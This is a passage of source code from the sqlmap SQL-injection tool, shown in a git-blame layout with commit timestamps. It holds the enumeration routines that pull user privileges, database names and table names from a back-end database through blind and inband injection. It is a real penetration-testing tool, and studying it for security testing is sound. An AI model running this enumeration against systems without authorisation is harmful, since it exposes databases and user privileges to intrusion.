else:
|
2010-03-25 18:46:06 +03:00
|
|
|
query += " OR ".join("%s = '%s'" % (condition, user) for user in users)
|
2009-01-20 00:25:37 +03:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2009-01-20 00:25:37 +03:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if not values and Backend.isDbms(DBMS.ORACLE) and not query2:
|
2010-03-25 18:46:06 +03:00
|
|
|
infoMsg = "trying with table USER_SYS_PRIVS"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-25 18:46:06 +03:00
|
|
|
return self.getPrivileges(query2=True)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2008-10-15 19:38:22 +04:00
|
|
|
for value in values:
|
2011-04-30 17:20:05 +04:00
|
|
|
user = None
|
2008-10-15 19:38:22 +04:00
|
|
|
privileges = set()
|
|
|
|
|
|
|
|
for count in xrange(0, len(value)):
|
|
|
|
# The first column is always the username
|
|
|
|
if count == 0:
|
|
|
|
user = value[count]
|
|
|
|
|
|
|
|
# The other columns are the privileges
|
|
|
|
else:
|
|
|
|
privilege = value[count]
|
|
|
|
|
|
|
|
# In PostgreSQL we get 1 if the privilege is
|
|
|
|
# True, 0 otherwise
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():
|
2011-03-09 15:06:32 +03:00
|
|
|
if int(privilege) == 1:
|
|
|
|
privileges.add(pgsqlPrivs[count])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
# In MySQL >= 5.0 and Oracle we get the list
|
|
|
|
# of privileges as string
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE) or ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema ):
|
2008-10-15 19:38:22 +04:00
|
|
|
privileges.add(privilege)
|
|
|
|
|
|
|
|
# In MySQL < 5.0 we get Y if the privilege is
|
|
|
|
# True, N otherwise
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-03-09 15:06:32 +03:00
|
|
|
if privilege.upper() == "Y":
|
|
|
|
privileges.add(mysqlPrivs[count])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if self.__isAdminFromPrivileges(privileges):
|
|
|
|
areAdmins.add(user)
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if kb.data.cachedUsersPrivileges.has_key(user):
|
|
|
|
kb.data.cachedUsersPrivileges[user].extend(privileges)
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.cachedUsersPrivileges[user] = list(privileges)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
if not kb.data.cachedUsersPrivileges and not conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
conditionChar = " LIKE "
|
|
|
|
else:
|
|
|
|
conditionChar = "="
|
2008-11-02 21:17:12 +03:00
|
|
|
|
2011-04-30 18:50:27 +04:00
|
|
|
if not len(users):
|
|
|
|
users = self.getUsers()
|
2008-11-02 21:17:12 +03:00
|
|
|
|
2011-04-30 18:50:27 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
|
|
|
for user in users:
|
|
|
|
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
|
2009-01-20 00:25:37 +03:00
|
|
|
|
|
|
|
if parsedUser:
|
2011-04-30 18:50:27 +04:00
|
|
|
users[users.index(user)] = parsedUser.groups()[0]
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
retrievedUsers = set()
|
|
|
|
|
|
|
|
for user in users:
|
2011-04-30 18:50:27 +04:00
|
|
|
if user in retrievedUsers:
|
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
user = "%%%s%%" % user
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "fetching number of privileges "
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg += "for user '%s'" % user
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.count2 % user
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.count % (conditionChar, user)
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE) and query2:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.count2 % user
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.count % user
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 18:54:29 +04:00
|
|
|
if not (isinstance(count, basestring) and count.isdigit()) and Backend.isDbms(DBMS.ORACLE) and not query2:
|
2010-03-25 18:46:06 +03:00
|
|
|
infoMsg = "trying with table USER_SYS_PRIVS"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
return self.getPrivileges(query2=True)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "unable to retrieve the number of "
|
2008-11-02 21:17:12 +03:00
|
|
|
warnMsg += "privileges for user '%s'" % user
|
2008-10-15 19:38:22 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
continue
|
|
|
|
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching privileges for user '%s'" % user
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
privileges = set()
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2010-01-09 03:05:00 +03:00
|
|
|
plusOne = True
|
|
|
|
else:
|
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, plusOne=plusOne)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.query2 % (user, index)
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.query % (conditionChar, user, index)
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE) and query2:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.query2 % (user, index)
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.query % (index, user)
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-04-30 18:50:27 +04:00
|
|
|
query = rootQuery.blind.query % (user, index)
|
2011-01-19 02:02:11 +03:00
|
|
|
privilege = inject.getValue(query, inband=False, error=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-11-02 21:17:12 +03:00
|
|
|
# In PostgreSQL we get 1 if the privilege is True,
|
|
|
|
# 0 otherwise
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.PGSQL) and ", " in privilege:
|
2008-10-15 19:38:22 +04:00
|
|
|
privilege = privilege.replace(", ", ",")
|
|
|
|
privs = privilege.split(",")
|
|
|
|
i = 1
|
|
|
|
|
|
|
|
for priv in privs:
|
|
|
|
if priv.isdigit() and int(priv) == 1:
|
2011-03-11 17:54:41 +03:00
|
|
|
for position, pgsqlPriv in pgsqlPrivs.items():
|
2008-10-15 19:38:22 +04:00
|
|
|
if position == i:
|
|
|
|
privileges.add(pgsqlPriv)
|
|
|
|
|
|
|
|
i += 1
|
|
|
|
|
|
|
|
# In MySQL >= 5.0 and Oracle we get the list
|
|
|
|
# of privileges as string
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE) or ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema ):
|
2008-10-15 19:38:22 +04:00
|
|
|
privileges.add(privilege)
|
|
|
|
|
|
|
|
# In MySQL < 5.0 we get Y if the privilege is
|
|
|
|
# True, N otherwise
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2008-10-15 19:38:22 +04:00
|
|
|
privilege = privilege.replace(", ", ",")
|
|
|
|
privs = privilege.split(",")
|
|
|
|
i = 1
|
|
|
|
|
|
|
|
for priv in privs:
|
|
|
|
if priv.upper() == "Y":
|
2011-03-11 17:54:41 +03:00
|
|
|
for position, mysqlPriv in mysqlPrivs.items():
|
2008-10-15 19:38:22 +04:00
|
|
|
if position == i:
|
|
|
|
privileges.add(mysqlPriv)
|
|
|
|
|
|
|
|
i += 1
|
2010-03-25 18:46:06 +03:00
|
|
|
|
|
|
|
# In Firebird we get one letter for each privilege
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
2010-03-18 20:20:54 +03:00
|
|
|
privileges.add(firebirdPrivs[privilege.strip()])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if self.__isAdminFromPrivileges(privileges):
|
|
|
|
areAdmins.add(user)
|
|
|
|
|
2008-11-02 21:17:12 +03:00
|
|
|
# In MySQL < 5.0 we break the cycle after the first
|
|
|
|
# time we get the user's privileges otherwise we
|
|
|
|
# duplicate the same query
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2008-11-02 21:17:12 +03:00
|
|
|
break
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
if privileges:
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.cachedUsersPrivileges[user] = list(privileges)
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "unable to retrieve the privileges "
|
2008-10-15 19:38:22 +04:00
|
|
|
warnMsg += "for user '%s'" % user
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
retrievedUsers.add(user)
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedUsersPrivileges:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "unable to retrieve the privileges "
|
2008-10-15 19:38:22 +04:00
|
|
|
errMsg += "for the database users"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return ( kb.data.cachedUsersPrivileges, areAdmins )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-25 18:46:06 +03:00
|
|
|
def getRoles(self, query2=False):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
|
2010-03-25 18:46:06 +03:00
|
|
|
warnMsg += "exist. sqlmap will enumerate privileges instead"
|
2010-03-26 23:45:22 +03:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
return self.getPrivileges(query2)
|
2010-03-25 18:46:06 +03:00
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
def getDbs(self):
|
2011-04-30 19:29:19 +04:00
|
|
|
if len(kb.data.cachedDbs) > 0:
|
|
|
|
return kb.data.cachedDbs
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "information_schema not available, "
|
2008-10-15 19:38:22 +04:00
|
|
|
warnMsg += "back-end DBMS is MySQL < 5. database "
|
2008-10-26 20:00:07 +03:00
|
|
|
warnMsg += "names will be fetched from 'mysql' database"
|
2008-10-15 19:38:22 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "schema names are going to be used on Oracle "
|
2011-03-21 14:29:43 +03:00
|
|
|
warnMsg += "for enumeration as the counterpart to database "
|
|
|
|
warnMsg += "names on other DBMSes"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
infoMsg = "fetching database (schema) names"
|
|
|
|
else:
|
|
|
|
infoMsg = "fetching database names"
|
|
|
|
|
2008-11-12 03:36:50 +03:00
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].dbs
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2011-01-19 02:02:11 +03:00
|
|
|
value = inject.getValue(query, blind=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(value):
|
2010-12-22 21:55:50 +03:00
|
|
|
kb.data.cachedDbs = arrayizeValue(value)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
if not kb.data.cachedDbs and not conf.direct:
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching number of databases"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2008-10-15 19:38:22 +04:00
|
|
|
errMsg = "unable to retrieve the number of databases"
|
2011-03-25 22:50:06 +03:00
|
|
|
logger.error(errMsg)
|
2011-03-21 14:29:43 +03:00
|
|
|
else:
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-03-25 22:50:06 +03:00
|
|
|
plusOne = True
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-03-25 22:50:06 +03:00
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, plusOne=plusOne)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.SYBASE):
|
2011-03-25 22:50:06 +03:00
|
|
|
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-03-25 22:50:06 +03:00
|
|
|
query = rootQuery.blind.query2 % index
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.query % index
|
|
|
|
db = inject.getValue(query, inband=False, error=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-03-25 22:50:06 +03:00
|
|
|
if db:
|
2011-04-30 19:29:19 +04:00
|
|
|
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedDbs:
|
2011-03-25 22:50:06 +03:00
|
|
|
infoMsg = "falling back to current database"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
self.getCurrentDb()
|
|
|
|
|
|
|
|
if kb.data.currentDb:
|
|
|
|
kb.data.cachedDbs = [kb.data.currentDb]
|
|
|
|
else:
|
|
|
|
errMsg = "unable to retrieve the database names"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedDbs
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-09 13:50:38 +03:00
|
|
|
def getTables(self, bruteForce=None):
|
2011-04-30 19:29:19 +04:00
|
|
|
if len(kb.data.cachedTables) > 0:
|
|
|
|
return kb.data.cachedTables
|
|
|
|
|
2010-12-27 17:17:20 +03:00
|
|
|
self.forceDbmsEnum()
|
|
|
|
|
2011-02-09 13:50:38 +03:00
|
|
|
if bruteForce is None:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2011-02-09 13:50:38 +03:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-02-09 13:50:38 +03:00
|
|
|
try:
|
|
|
|
tables = self.getTables(False)
|
|
|
|
except sqlmapNoneDataException:
|
|
|
|
tables = None
|
|
|
|
|
|
|
|
if not tables:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve table names, "
|
2011-02-09 13:50:38 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
else:
|
|
|
|
return tables
|
2010-10-29 13:00:51 +04:00
|
|
|
|
2011-04-30 19:29:19 +04:00
|
|
|
if conf.db == "CD":
|
|
|
|
conf.db = self.getCurrentDb()
|
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if conf.db and Backend.isDbms(DBMS.ORACLE):
|
2011-04-30 19:29:19 +04:00
|
|
|
conf.db = conf.db.upper()
|
|
|
|
|
|
|
|
if conf.db:
|
|
|
|
dbs = conf.db.split(",")
|
|
|
|
else:
|
|
|
|
dbs = self.getDbs()
|
|
|
|
|
|
|
|
for db in dbs:
|
|
|
|
dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)
|
2011-03-26 00:46:49 +03:00
|
|
|
|
2010-11-02 14:06:47 +03:00
|
|
|
if bruteForce:
|
2010-12-27 17:17:20 +03:00
|
|
|
resumeAvailable = False
|
2011-01-12 00:46:21 +03:00
|
|
|
|
2010-12-27 17:17:20 +03:00
|
|
|
for db, table in kb.brute.tables:
|
|
|
|
if db == conf.db:
|
|
|
|
resumeAvailable = True
|
|
|
|
break
|
|
|
|
|
|
|
|
if resumeAvailable:
|
|
|
|
for db, table in kb.brute.tables:
|
|
|
|
if db == conf.db:
|
|
|
|
if not kb.data.cachedTables.has_key(conf.db):
|
|
|
|
kb.data.cachedTables[conf.db] = [table]
|
|
|
|
else:
|
|
|
|
kb.data.cachedTables[conf.db].append(table)
|
|
|
|
|
|
|
|
return kb.data.cachedTables
|
|
|
|
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common table existence check? [Y/n/q]"
|
2010-09-30 23:45:23 +04:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
2010-10-29 13:00:51 +04:00
|
|
|
else:
|
2010-11-09 12:42:43 +03:00
|
|
|
return tableExists(paths.COMMON_TABLES)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "fetching tables for database"
|
|
|
|
infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db for db in dbs))
|
2008-11-12 03:36:50 +03:00
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].tables
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-12-22 14:46:18 +03:00
|
|
|
condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-22 14:46:18 +03:00
|
|
|
if condition:
|
2011-04-30 19:29:19 +04:00
|
|
|
if conf.excludeSysDbs:
|
2008-10-15 19:38:22 +04:00
|
|
|
query += " WHERE "
|
2011-03-30 01:54:15 +04:00
|
|
|
query += " AND ".join("%s != '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-12-22 14:46:18 +03:00
|
|
|
logger.info(infoMsg)
|
2011-04-30 19:29:19 +04:00
|
|
|
elif not Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query += " WHERE "
|
|
|
|
query += " OR ".join("%s = '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in dbs)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MSSQL):
|
2010-12-22 14:46:18 +03:00
|
|
|
query = safeStringFormat(query, conf.db)
|
2011-04-30 19:29:19 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
value = inject.getValue(query, blind=False)
|
2011-02-04 16:29:02 +03:00
|
|
|
value = filter(lambda x: x, value)
|
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(value):
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.SQLITE):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(value, basestring):
|
2010-11-02 14:59:24 +03:00
|
|
|
value = [[ DBMS.SQLITE, value ]]
|
2010-03-18 20:20:54 +03:00
|
|
|
elif isinstance(value, (list, tuple, set)):
|
|
|
|
newValue = []
|
|
|
|
|
|
|
|
for v in value:
|
2010-11-02 14:59:24 +03:00
|
|
|
newValue.append([ DBMS.SQLITE, v])
|
2010-03-18 20:20:54 +03:00
|
|
|
|
|
|
|
value = newValue
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
for db, table in value:
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
|
|
|
table = safeSQLIdentificatorNaming(table, True)
|
2011-04-30 04:22:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedTables.has_key(db):
|
|
|
|
kb.data.cachedTables[db] = [table]
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.cachedTables[db].append(table)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
if not kb.data.cachedTables and not conf.direct:
|
2008-10-15 19:38:22 +04:00
|
|
|
for db in dbs:
|
|
|
|
if conf.excludeSysDbs and db in self.excludeDbsList:
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "skipping system database '%s'" % db
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
continue
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "fetching number of tables for "
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg += "database '%s'" % db
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-09 13:33:29 +03:00
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS):
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-03-18 20:20:54 +03:00
|
|
|
else:
|
2011-03-30 01:54:15 +04:00
|
|
|
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "unable to retrieve the number of "
|
2008-10-15 19:38:22 +04:00
|
|
|
warnMsg += "tables for database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
continue
|
|
|
|
|
2010-03-18 20:20:54 +03:00
|
|
|
tables = []
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2010-01-09 03:05:00 +03:00
|
|
|
plusOne = True
|
|
|
|
else:
|
|
|
|
plusOne = False
|
2010-05-30 18:53:13 +04:00
|
|
|
indexRange = getRange(count, plusOne=plusOne)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.SYBASE):
|
2010-10-26 02:11:38 +04:00
|
|
|
query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
|
2011-02-09 13:33:29 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS):
|
2010-11-03 01:11:45 +03:00
|
|
|
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query % index
|
2010-03-18 20:20:54 +03:00
|
|
|
else:
|
2011-03-30 01:54:15 +04:00
|
|
|
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
|
2011-04-30 04:22:22 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
table = inject.getValue(query, inband=False, error=False)
|
2010-04-15 13:36:13 +04:00
|
|
|
kb.hintValue = table
|
2011-03-30 01:54:15 +04:00
|
|
|
table = safeSQLIdentificatorNaming(table, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
tables.append(table)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if tables:
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.cachedTables[db] = tables
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-05-22 13:48:46 +04:00
|
|
|
warnMsg = "unable to retrieve the table names "
|
2008-10-15 19:38:22 +04:00
|
|
|
warnMsg += "for database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2011-05-22 13:48:46 +04:00
|
|
|
if isNoneValue(kb.data.cachedTables):
|
|
|
|
kb.data.cachedTables.clear()
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedTables:
|
2011-05-22 13:48:46 +04:00
|
|
|
errMsg = "unable to retrieve the table names for any database"
|
|
|
|
if bruteForce is None:
|
|
|
|
logger.error(errMsg)
|
|
|
|
return self.getTables(bruteForce=True)
|
|
|
|
else:
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedTables
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def getColumns(self, onlyColNames=False):
|
2011-05-01 02:10:27 +04:00
|
|
|
self.forceDbmsEnum()
|
2010-11-11 20:09:31 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if conf.db is None or conf.db == "CD":
|
|
|
|
if conf.db is None:
|
|
|
|
warnMsg = "missing database parameter, sqlmap is going "
|
|
|
|
warnMsg += "to use the current database to enumerate "
|
|
|
|
